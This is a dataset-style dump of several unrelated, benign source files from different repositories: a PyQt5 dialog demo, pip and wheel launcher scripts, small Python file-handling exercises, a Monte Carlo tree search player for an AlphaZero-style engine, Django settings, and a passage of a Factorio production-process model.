7f1582310fce8bb63a60feb0308e0de86eb8ba7a | 4dc81896d35f7bd9c7df1cb976432d52d3f0b051 | /dialogs/QDialogDemo.py | 0735b8a918d11a1e30bea52bf8394bc40488e654 | [] | no_license | scholar-he/PyQt5 | 8cbd7a76cc55c812c97c6522700474b3548d1ff8 | 78e5739032cfa5faa8177a5f380ccb35502603ae | refs/heads/master | 2020-08-02T17:59:04.286178 | 2019-10-27T14:04:09 | 2019-10-27T14:04:09 | 211,456,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,134 | py | #! /usr/bin/python
# -*-coding:utf-8-*-
"""
@Author: Tony 2513141027
@Date: 2019/10/5 21:20
@Description: 对话框(QDialog)
QMessageBox
QColorDialog
QFileDialog
QFontDialog
QInputDialog
QMainWindow
QWidget
QDialog
"""
import sys
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
class QDialogDemo(QMainWindow):
def __init__(self):
super(QDialogDemo, self).__init__()
self.initUI()
def initUI(self):
self.setWindowTitle("QDialog案例")
self.resize(300, 200)
self.button = QPushButton(self)
self.button.setText("弹出对话框")
self.button.move(50, 50)
self.button.clicked.connect(self.showDialog)
def showDialog(self):
dialog = QDialog()
button = QPushButton("确定", dialog)
button.clicked.connect(dialog.close)
button.move(50, 50)
dialog.setWindowTitle("对话框")
dialog.setWindowModality(Qt.ApplicationModal)
dialog.exec()
if __name__ == '__main__':
app = QApplication(sys.argv)
main = QDialogDemo()
main.show()
sys.exit(app.exec_()) | [
"2513141027@qq.com"
] | 2513141027@qq.com |
deb2abd5367b7ec66c36a0df80d45c3cd37333be | 501779828e79d69e60ed09786fbfdd6671101de1 | /venv/Scripts/pip-script.py | fd098e67c7f923b3ac7849064c057c6cbaae7e13 | [] | no_license | shi-wal/face-detection-using-cv | 24855fb40e699aff2ab18d688c6f340f612457e0 | c940590c0dedcf41d98f761f1970cb5a215772fa | refs/heads/main | 2023-02-13T07:02:19.270725 | 2021-01-13T11:52:58 | 2021-01-13T11:52:58 | 329,284,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | #!C:\Users\Shivii\PycharmProject\FaceDetection\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
)
| [
"shivangiagrawal667@gmail.com"
] | shivangiagrawal667@gmail.com |
1c837a755029ecaa022cf1e10f5a55ee99df4306 | 6c9b128e4a3187b64341aa21111282d8ebadd156 | /env/bin/wheel | 396e6d35631483bb0fab12519ee61ccf9fe4299d | [] | no_license | sagarkunayak/school | a6643a5849ba904477d3cb3308e2c7ac6dbac340 | 9b9915965189c7089c143961bb0e8642d4fa7a59 | refs/heads/main | 2023-04-06T08:56:18.646744 | 2021-04-17T16:52:22 | 2021-04-17T16:52:22 | 358,930,454 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | #!/Users/sagarkumarnayak/Downloads/school_learning_management-main/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"sagarkumarnayak@Sagars-MacBook-Air.local"
] | sagarkumarnayak@Sagars-MacBook-Air.local | |
eef24096c5c29099532f705e4db5d31d6c92c56b | 53aca4b34dfed272ac18d19402e0eacc26b3d1c5 | /Python :: semi-advanced/files and streams/3_files_with_context_manager.py | 91ea54039b7e1e2df8014e7dd97059a9d603ff11 | [] | no_license | tenzo/python_course | 93f0dbd6cc9b85ad9c9d7bcee64aef880816e729 | db29b7fb848f62e42b0e06d6a3d97b4f63681e85 | refs/heads/master | 2022-11-27T14:24:53.994735 | 2020-06-06T12:13:22 | 2020-06-06T12:14:01 | 269,942,976 | 0 | 1 | null | 2022-11-24T05:38:22 | 2020-06-06T10:13:28 | Python | UTF-8 | Python | false | false | 414 | py | if __name__ == '__main__':
# preferowanym sposobem otwierania pliku w pythonie jest użycie managera kontekstu:
with open('python_zen.txt') as file:
print(file.read())
print("W tym miejscu plik jest jeszcze otwarty")
print("Dalsza część programu")
# zapis:
with open('some_text.txt', 'w') as file:
file.write('Ala ma kota\n')
file.write('Kot ma czołg\n')
| [
"tenzo.dev@gmail.com"
] | tenzo.dev@gmail.com |
9563088898f41821a07e371b8548c06e7556c562 | 6cce4c33548d71b6c780f6fbdafdde9f02de9a00 | /03-FileHandling/FH13.py | aca2afadfc321617b937ed8017896dbdb841faa1 | [] | no_license | DamianDamian-Domin/pp1 | 46b9cda0dbcb024ea6234ca999a8d3a61af4948c | 32d25701b9974752aee7fed9fc9e35cc979c1a2f | refs/heads/master | 2020-08-20T17:37:46.831228 | 2020-01-29T18:23:59 | 2020-01-29T18:23:59 | 216,049,530 | 2 | 0 | null | 2019-10-18T15:03:25 | 2019-10-18T15:03:25 | null | UTF-8 | Python | false | false | 199 | py | '''
program
'''
tablica = [32, 16, 5, 8, 24, 7]
index = -1
with open('liczby.txt', 'w') as file:
for x in range(-1, 5):
index = index + 1
file.write(str(tablica[index]) + "\n")
| [
"damian.domin334@gmail.com"
] | damian.domin334@gmail.com |
0171b167d839283f68195e743403d47603fa9f35 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_004/ch15_2019_03_15_12_37_22_879295.py | 63ff08a3f9db6f997d4660dad3874728fbdd779e | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | import math
def volume_da_pizza(z, a):
v=(math.pi*(z**2))*a
return v
| [
"you@example.com"
] | you@example.com |
be79a731cff3c1f31405abfcd8ba88fc1b6f2881 | ffcfd600e45431246b57e39ad33696660e8e341d | /mcts_cyclic_ref.py | 2475d047849e678c9d2a0a5675ea252ffc516a2b | [] | no_license | kwtsangg/alphazeropy | 372a5ba3bc2da806de25f8bd8afce19f3a714746 | 0fe6d0dbf9376de6b9d5f9704dbbad97dd2f190d | refs/heads/master | 2023-01-24T10:05:13.949032 | 2023-01-08T21:02:45 | 2023-01-08T21:02:45 | 138,353,092 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,876 | py | #!/usr/bin/env python
from __future__ import print_function # to prevent Py2 from interpreting it as a tuple
__file__ = "mcts_cyclic_ref.py"
__author__ = "Ka Wa Tsang"
__copyright__ = "Copyright 2018"
__version__ = "1.0.1"
__email__ = "kwtsang@nikhef.nl"
__date__ = "2018-Feb-15"
Description=""" To make MCTS by PUCT algorithm
"""
#===============================================================================
# Module
#===============================================================================
import numpy as np
import sys
sys.setrecursionlimit(15000)
import copy
import time
#===============================================================================
# Functions
#===============================================================================
def softmax(x):
"""Compute softmax values for each sets of scores in x."""
e_x = np.exp(x - np.max(x))
return e_x / e_x.sum()
#===============================================================================
# Main
#===============================================================================
class TreeNode:
def __init__(self, parent, prior_p):
self.parent = parent # previous TreeNode
self.children = {} # a map from action to TreeNode
self.N = 0 # visit count
self.Q = 0 # mean action-value
self.P = prior_p # prior probability of selecting this node from parent
# self.best_child_value = 0
def select(self, c_puct):
"""
Select action among children that gives maximum Q+U.
Output:
A tuple of (action, children_node)
"""
return max(self.children.items(), key=lambda node: node[1].get_QplusU(c_puct))
def get_QplusU(self, c_puct):
return self.Q + self.get_U(c_puct)
def get_U(self, c_puct):
return c_puct*self.P*np.sqrt(self.parent.N)/(1.+self.N)
def expand(self, policy, legal_action):
"""
To create children node
Input:
policy: the output[0][:-1] of the predict function in the model class. eg. AlphaZero_Gomoku.predict(,False)[0][:-1]
policy[0] is a 2D array representing the probability of playing that move on board
policy[1] is a number representing the probability of playing "PASS"
"""
for action in legal_action:
if type(action) == str:
# 'PASS' move
if action not in self.children:
self.children[action] = TreeNode(self, policy[1])
else:
if action not in self.children:
self.children[action] = TreeNode(self, policy[0][action])
def update(self, leaf_value):
self.N += 1
self.Q += (leaf_value - self.Q)/self.N
def update_parent_recursively(self, leaf_value):
"""
Update myself and all ancestors
"""
if not self.is_root():
self.parent.update_parent_recursively(-leaf_value)
self.update(leaf_value)
def is_root(self):
return not self.parent
def is_leaf(self):
return not self.children
class MCTS:
def __init__(self, policy_value_fn, c_puct=10., n_rollout=100, s_thinking=None, use_thinking=False):
"""
Input:
policy_value_fn : the predict function in the model class. eg. AlphaZero_Gomoku.predict(,False)
"""
self.policy_value_fn = policy_value_fn
self.root_node = TreeNode(None, 1.0)
self.c_puct = float(c_puct)
self.n_rollout = int(n_rollout)
self.s_thinking = s_thinking
self.use_thinking = use_thinking
def rollout(self, Board, epsilon=0.25, dirichlet_param=0.1):
"""
a rollout from the root node to the leaf node (may or may not be the end of the game)
CAUTION: This function will modify the input Board. So a copy.deepcopy must be provided.
"""
node = self.root_node
while not node.is_leaf():
# greedily select next move according to Q+U
action, node = node.select(self.c_puct)
Board.move(action)
# check whether the game ends
Board.check_winner()
if Board.winner[0]:
if Board.winner[1] == 0:
# if draw game
leaf_value = 0.
else:
leaf_value = 1. if Board.winner[1] == Board.current_player else -1.
else:
# a random dihedral transformation is performed before feeding into AlphaZero
rotation_order = np.random.choice(Board.rotation_symmetry)
reflection_order = np.random.choice(Board.reflection_symmetry)
feature_box = Board.get_current_player_feature_box()
for i in range(len(feature_box)):
feature_box[i] = self.dihedral_transformation(feature_box[i], rotation_order, reflection_order)
policy_value = self.policy_value_fn(np.array([feature_box]), raw_output = False)
policy = list(policy_value[0][:-1])
policy[0] = self.dihedral_transformation(policy[0], rotation_order, reflection_order, inverse=True)
# add Dirichlet Noise to encourage exploration
noise = np.random.dirichlet(dirichlet_param*np.ones(Board.height*Board.width+1))
policy[0] = policy[0]*(1.-epsilon) + epsilon*noise[:-1].reshape(Board.height, Board.width)
policy[1] = policy[1]*(1.-epsilon) + epsilon*noise[-1]
# expand
leaf_value = policy_value[0][-1]
node.expand(policy, Board.get_legal_action())
# Update the leaf and its ancestors
node.update_parent_recursively(-leaf_value)
def dihedral_transformation(self, feature_plane, rotation_order, reflection_order, inverse=False):
"""
rotation and reflection are not commutative. Here I decided to first perform reflection.
"""
if not inverse:
if reflection_order:
result = np.rot90(np.fliplr(feature_plane), rotation_order)
else:
result = np.rot90(feature_plane, rotation_order)
else:
if reflection_order:
result = np.fliplr(np.rot90(feature_plane, -rotation_order))
else:
result = np.rot90(feature_plane, -rotation_order)
return result
def get_move_probability(self, Board, temp=1., epsilon=0.25, dirichlet_param=0.1):
"""
Input:
Board: current board
temp : T to control level of exploration. temp = 1. or high encourages exploration while temp = 1e-3 or small means to select strongest move.
Output:
move probability on board
"""
if self.use_thinking:
start_time = time.time()
while time.time()-start_time < self.s_thinking:
Board_deepcopy = copy.deepcopy(Board)
self.rollout(Board_deepcopy, epsilon, dirichlet_param)
else:
for i in range(self.n_rollout):
Board_deepcopy = copy.deepcopy(Board)
self.rollout(Board_deepcopy, epsilon, dirichlet_param)
move_N_Q = [(move, node.N, node.Q) for move, node in self.root_node.children.items()] # transform a dictionary to tuple
move, N, Q = list(zip(*move_N_Q)) # unzip the tuple into move and N
if temp:
probs = softmax(np.log(N)/temp + 1e-9)
else:
probs = np.zeros(len(N))
probs[np.argmax(N)] = 1.
return move, probs, Q
def update_with_move(self, last_move):
"""
After the opponent player moves, the child node corresponding to the played action becomes the new root node;
the subtree below this child is retained along with all its statistics, while the remainder of the tree is discarded
"""
last_move = tuple(last_move)
if last_move in self.root_node.children:
self.root_node = self.root_node.children[last_move]
self.root_node.parent = None
else:
self.root_node = TreeNode(None, 1.0)
def reset(self):
self.root_node = TreeNode(None, 1.0)
class MCTS_player:
def __init__(self, policy_value_fn, c_puct = 5., n_rollout = 100, epsilon = 0.25, dirichlet_param = 0.1, temp = 1., name = "", s_thinking = None, use_thinking = False):
self.name = str(name)
self.nature = "mcts"
self.policy_value_fn = policy_value_fn
self.c_puct = float(c_puct)
self.n_rollout = int(n_rollout)
self.epsilon = float(epsilon)
self.dirichlet_param = float(dirichlet_param)
self.temp = float(temp)
self.s_thinking = float(s_thinking)
self.use_thinking = use_thinking
self.MCTS = MCTS(self.policy_value_fn, c_puct=self.c_puct, n_rollout=self.n_rollout, s_thinking=self.s_thinking, use_thinking=self.use_thinking)
def get_move(self, Board, **kwargs):
"""
epsilon [0,1] is to control how much dirichlet noise is added for exploration. 1 means complete noise.
"""
epsilon = float(kwargs.get('epsilon', 0.25))
dirichlet_param = float(kwargs.get('dirichlet_param', 0.3))
is_return_probs = kwargs.get('is_return_probs', False)
temp = float(kwargs.get('temp', self.temp))
is_analysis = kwargs.get('is_analysis', False)
if Board.get_legal_action():
move, probs, Q = self.MCTS.get_move_probability(Board, temp)
selected_move_index = np.random.choice(np.arange(len(move)), p=probs)
selected_move = move[selected_move_index]
selected_move_probs = probs[selected_move_index]
selected_move_value = Q[selected_move_index]
self.MCTS.update_with_move(selected_move)
if is_return_probs:
return_probs = np.zeros(Board.height*Board.width+1)
return_Q = np.zeros(Board.height*Board.width+1)
for imove, iprobs, iQ in list(zip(move, probs, Q)):
if imove == "PASS":
return_probs[-1] = iprobs
return_Q[-1] = iQ
else:
return_probs[imove[0]*Board.width+imove[1]] = iprobs
return_Q[imove[0]*Board.width+imove[1]] = iQ
if is_analysis:
self.print_analysis(return_probs[:-1].reshape(Board.height, Board.width), selected_move_probs, return_Q[:-1].reshape(Board.height, Board.width), selected_move_value)
return selected_move, return_probs, selected_move_probs, return_Q, selected_move_value
else:
return selected_move
else:
print("No legal move anymore. It should not happen because the game otherwise ends")
def update_opponent_move(self, opponent_last_move, children_id=None):
"""
children_id is unused but needed.
"""
self.MCTS.update_with_move(opponent_last_move)
def reset(self):
self.MCTS.reset()
def print_analysis(self, return_probs_reshaped, selected_move_prob, return_Q_reshaped, selected_move_value):
print("")
print("The value at the move is")
print(return_Q_reshaped)
print("The resultant policy is")
print(return_probs_reshaped)
print("The value of the chosen move = ", selected_move_value)
print("The probabilty of the chosen move = ", selected_move_prob)
| [
"kwtsang@nikhef.nl"
] | kwtsang@nikhef.nl |
1c6dd289e98ae42ebdf861b133e0e659659202dc | d00d8a7fcfc567e0c761460e27313e085540ea1b | /ansible/roles/job_tracker-setup/files/job_tracker/__main__.py | 077c93755ce0aafdd65a29a0b7d6ac8befd3aa1d | [] | no_license | chrigifrei/job_tracker | 70bf6aa218131f944bed1dcd248bdd0fb68543b4 | 71d4ab8d9c3fcf6e346e121d5dea24989ee6b974 | refs/heads/master | 2021-01-20T05:15:39.365582 | 2017-08-25T16:56:45 | 2017-08-25T16:56:45 | 62,312,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | #!/usr/bin/env python
# import job_tracker
try:
import job_tracker
except:
pass
| [
"chrigi.frei@gmail.com"
] | chrigi.frei@gmail.com |
1a5d5e949e7a40f1281ffefdc9c70f374f8a646e | bc355f7d1f4e60dc648ffaddec55c51b6484204e | /interview_prep/settings/production.py | 581c7758889fa7483e21a29b98a739d45fcfc6ec | [] | no_license | adrind/job-lab-interview | ce7709ef7c2089b0b6aa7713a68ee2fef75dde85 | f7385e12b5c60cc2ecf339c799b121893c38a67d | refs/heads/master | 2022-12-11T09:16:02.824061 | 2017-08-18T19:16:09 | 2017-08-18T19:16:09 | 100,575,053 | 0 | 0 | null | 2022-12-08T00:44:29 | 2017-08-17T07:33:11 | Python | UTF-8 | Python | false | false | 785 | py | from __future__ import absolute_import, unicode_literals
from .base import *
# Parse database configuration from $DATABASE_URL
import dj_database_url
import os
env = os.environ.copy()
SECRET_KEY = env['SECRET_KEY']
DATABASES['default'] = dj_database_url.config()
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
COMPRESS_OFFLINE = True
COMPRESS_CSS_FILTERS = [
'compressor.filters.css_default.CssAbsoluteFilter',
'compressor.filters.cssmin.CSSMinFilter',
]
COMPRESS_CSS_HASHING_METHOD = 'content'
DEBUG = False
try:
from .local import *
except ImportError:
pass
| [
"adrienne@codeforamerica.org"
] | adrienne@codeforamerica.org |
4ca9f354434ea2b8ed4dd2b30525c00bb6fcc22a | ffed3df7a2545c4b20d510b4c6679d2504fe830e | /curso python/ARAdmin/manage.py | 8eda57533eec644f1c3ef8d57e53430979bd5e93 | [] | no_license | josejimenez1931056/AdminWebAR | 19eef4ca959d3ff3aa2bfcf65d5eb6e6baee5219 | 9f27dbc5b8b2cdeceb4fe97e07d5a53c4b15ccec | refs/heads/master | 2023-01-10T19:27:34.544308 | 2020-02-01T23:41:44 | 2020-02-01T23:41:44 | 237,681,965 | 0 | 0 | null | 2023-01-07T14:22:28 | 2020-02-01T21:42:38 | Python | UTF-8 | Python | false | false | 627 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ARAdmin.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"luis.joshep@hotmail.com"
] | luis.joshep@hotmail.com |
26ea2eac2297c38d86977e917dae29fbde0eb86f | 82f5ec2f9ad8ddfa3f4a6bb5be95cd6523c1dfdf | /course1/week3/dot_product.py | a8ceffe50b2671204734cd8002ed632c3eea535d | [] | no_license | AlexanderOnbysh/algorithmic-toolbox | 051bca6313fe0c340df3d13af1a58a73d405869e | 87ff4d2c68e0901e1a650916591095e83d4ea8b4 | refs/heads/master | 2020-03-20T17:55:42.131707 | 2018-06-24T12:32:51 | 2018-06-22T19:00:00 | 137,568,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | # Uses python3
import sys
def max_dot_product(a, b):
a, b = sorted(a), sorted(b)
res = 0
for i in range(len(a)):
res += a[i] * b[i]
return res
if __name__ == '__main__':
input = sys.stdin.read()
data = list(map(int, input.split()))
n = data[0]
a = data[1:(n + 1)]
b = data[(n + 1):]
print(max_dot_product(a, b))
| [
"alexandr.onbysh@ring.com"
] | alexandr.onbysh@ring.com |
45ea3e7d8004d23bd4b5fe78a403b5515a80826a | 42000e14d25ce3de5b9ba24e3399e67bf88c4ad1 | /Level_Three/ProTwo/AppTwo/migrations/0001_initial.py | db9703f5f9d755c7f363b452bdc1ccaea87e2c26 | [] | no_license | cdunn6754/Django_Projects | 0528b3263e2762d0e872686ec5f00a40f3730851 | 545d4e73f05969d1277cacaab2042787676b7e73 | refs/heads/master | 2021-09-11T18:21:07.249977 | 2018-04-11T00:06:27 | 2018-04-11T00:06:27 | 110,480,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-04-05 00:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=264)),
('last_name', models.CharField(max_length=264)),
('email', models.EmailField(max_length=264)),
],
),
]
| [
"cdunn6754@gmail.com"
] | cdunn6754@gmail.com |
cdcc1dcd5293dd7d91c547e9c8cf2f57eefcb5b5 | 9f71c97f3558e9ca21a9ae702826da613f7672fc | /ex19.py | 1181e0623b1c2e619e7b179665c471d30af3c76c | [] | no_license | kadiriswathi/loops | b9f903c8548360b3531de55381bfbf790e7c0c76 | 25f600ed95d174ecf997cdc44aed3e52efbe4042 | refs/heads/master | 2020-04-04T18:48:32.729319 | 2018-11-05T07:53:38 | 2018-11-05T07:53:38 | 156,179,964 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | sum=0
for x in range(1,11):
sum=sum+x
print(sum)
| [
"swthkadiri@gmail.com"
] | swthkadiri@gmail.com |
fefaea12b90a2ebdecfd66f70e2b87301c0a2b52 | 2023fa470a2df0c5feda1f57c87752c80366de83 | /01_基础/cal.py | 6b68252d04f9846bd3559237e621a9c39ef91051 | [] | no_license | lmmProject/python_01 | 73d53b2b65cc56db936de765b5b9472dc856f59a | f51d24fb054e970c847e448b6ff176b851e1f9fc | refs/heads/master | 2020-03-18T06:18:51.455204 | 2018-11-10T10:05:43 | 2018-11-10T10:05:43 | 134,387,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 678 | py | import math # 导入 math 模块
# 变量的定义,条件语句
a = 100
if a >= 0:
print(math.pow(2, 32))
else:
print(-a/2)
# 动态语言
a = a + 10.0
print(a)
a = 'abc'
b = a
a = 'xyz'
print(b)
# 整数的地板除//永远是整数,即使除不尽
print(10 // 3)
print(10 % 3)
# ASCII编码,大写字母A的编码是65,小写字母z的编码是122
print("获取字符串的整数表示ord():")
print(ord('a'))
print(chr(20013))
# 1个中文字符经过UTF-8编码后通常会占用3个字节
print(len('中'.encode('utf-8')))
# %运算符就是用来格式化字符串的
print('%2d-%02d' % (3,1))
print('%.2f' % 3.1425926)
r = 85/72
print('%.1f%%' % r) | [
"752634866@qq.com"
] | 752634866@qq.com |
92e405b5c5cb9c96d343d605c55c0818cfd3654b | 512f774fc3545e47cfaf6a2806583702cb09ed9b | /mysite2/mysite2/settings.py | d8102e653e8ab4f25a3120dd1d7dc3fea4ed97f5 | [] | no_license | young961227/Django | b6d25a709a461ef9256ca60f364dda05b4dfb35c | 108653133232ff0a96cf4b7061884d659aaf7f63 | refs/heads/master | 2023-08-04T15:50:04.726076 | 2020-05-22T12:30:42 | 2020-05-22T12:30:42 | 265,178,581 | 0 | 0 | null | 2021-09-22T19:02:34 | 2020-05-19T07:37:59 | Python | UTF-8 | Python | false | false | 3,126 | py | """
Django settings for mysite2 project.
Generated by 'django-admin startproject' using Django 3.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'a6^mw!6mc=1#j$mn^7_9g4z$#xi!e*wht&onml*6kw6=4$1%b%'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'news.apps.NewsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite2.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite2.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
| [
"yohesa@nate.com"
] | yohesa@nate.com |
dbd30435ecd8070d3826ac6105f00a019a270108 | 4c9af1f8223ad09fcfa65572840e478ebf3be66a | /python/app.py | c8115bcad7405a72f9c278882192dcb948b2c333 | [] | no_license | Michhud/content-gitops | 14ee9a3388002010255af9276838120757ffab0e | fe5dcc6c152ba5a69a9c66ae591c474249971441 | refs/heads/master | 2023-07-31T12:27:59.211821 | 2021-10-01T09:03:38 | 2021-10-01T09:03:38 | 412,072,710 | 0 | 0 | null | 2021-10-01T07:57:28 | 2021-09-30T13:18:46 | Python | UTF-8 | Python | false | false | 175 | py | from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello UvA student!"
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8000)
| [
"noreply@github.com"
] | Michhud.noreply@github.com |
decd9e6091b57449c7b7819c3f56ee801c7e18c7 | c74f732f38d6448b0efce232b08520415ba79144 | /personal/factorio/fact/processes.py | e4b64cf2177d9662c8a3c967a0d7664ad80f216d | [] | no_license | chuck1/python | 6910a32d85ffb7faa41cb1cf8cd1a437d9562b13 | 3dac080f7452528345e88eb62a77333af077bda0 | refs/heads/master | 2020-05-31T15:23:06.392592 | 2018-04-29T16:28:44 | 2018-04-29T16:28:44 | 13,030,890 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,969 | py | import math
import itertools
import crayons
import numpy as np
import scipy.optimize
from products import *
Process.electrical_energy = electrical_energy
mine_water = Process(
"mine_water",
[
ProductInput(water, -1200),
],
1,
)
mine_crude_oil = Process(
"mine_crude_oil",
[
ProductInput(crude_oil, -50),
],
1,
has_site=True,
building=pumpjack,
)
produce_pumpjack = Process(
"pumpjack",
[
ProductInput(electronic_circuit, 5),
ProductInput(iron_gear_wheel, 10),
ProductInput(pipe, 10),
ProductInput(steel_plate, 5),
ProductInput(pumpjack, -1),
],
5,
)
advanced_oil_processing = Process(
"advanced_oil_processing",
[
ProductInput(crude_oil, 100),
ProductInput(water, 50),
ProductInput(heavy_oil, -10),
ProductInput(light_oil, -45),
ProductInput(petroleum, -55),
],
5,
420,
has_site=True,
building=oil_refinery,
)
basic_oil_processing = Process(
"basic oil processing",
[
ProductInput(crude_oil, 100),
ProductInput(heavy_oil, -30),
ProductInput(light_oil, -30),
ProductInput(petroleum, -40),
],
5,
420,
building=oil_refinery,
)
mine_stone = Process(
"mine stone",
[
ProductInput(stone, -0.65),
],
1,
90,
has_site=True,
building=electric_mining_drill,
)
produce_stone_brick = Process(
"stone brick",
[
ProductInput(stone, 2, 1),
ProductInput(stone_brick, -1, 1),
],
3.5,
has_site=True,
building=electric_furnace,
)
mine_iron_ore = Process(
"mine iron ore",
[
ProductInput(iron_ore, -1),
],
1.905,
90,
has_site=True,
building=electric_mining_drill,
)
mine_copper_ore = Process(
"mine copper ore",
[
ProductInput(copper_ore, -0.525),
],
1,
90,
has_site=True,
building=electric_mining_drill,
)
mine_coal = Process(
"mine coal",
[
ProductInput(coal, -0.525),
],
1,
90,
has_site=True,
building=electric_mining_drill,
)
mine_uranium_ore = Process(
"uranium_ore",
[
ProductInput(sulfuric_acid, 1),
ProductInput(uranium_ore, -1),
],
1.905,
has_site=True,
building=electric_mining_drill,
)
uranium_processing = Process(
"uranium processing",
[
ProductInput(uranium_ore, 10),
ProductInput(uranium_235, -0.007),
ProductInput(uranium_238, -0.993),
],
10,
)
uranium_enrichment = Process(
"uranium enrichment",
[
ProductInput(uranium_238, 3),
ProductInput(uranium_235, -1),
],
50,
)
produce_uranium_fuel_cell = Process(
"uranium fuel cell",
[
ProductInput(iron_plate, 10),
ProductInput(uranium_235, 1),
ProductInput(uranium_238, 19),
ProductInput(uranium_fuel_cell, -10),
],
10,
)
produce_plastic_bar = Process(
"plastic bar",
[
ProductInput(coal, 1, 2),
ProductInput(petroleum, 20),
ProductInput(plastic_bar, -2, 1),
],
1,
has_site=True,
building=chemical_plant,
)
produce_sulfur = Process(
"sulfur",
[
ProductInput(petroleum, 30),
ProductInput(water, 30),
ProductInput(sulfur, -2, 1),
],
1,
has_site=True,
building=chemical_plant,
)
produce_iron_plate = Process(
"iron plate",
[
ProductInput(iron_ore, 0.57, 2),
ProductInput(iron_plate, -0.57, 2),
],
1,
180,
has_site=True,
building=electric_furnace,
)
produce_copper_plate = Process(
"copper plate",
[
ProductInput(copper_ore, 0.57, 2),
ProductInput(copper_plate, -0.57, 2),
],
1,
180,
has_site=True,
building=electric_furnace,
)
produce_copper_cable = Process(
"copper cable",
[
ProductInput(copper_plate, 1, 1),
ProductInput(copper_cable, -2, 2),
],
0.5,
has_site=True,
building=assembling_machine_3,
)
produce_steel_plate = Process("steel plate",
[
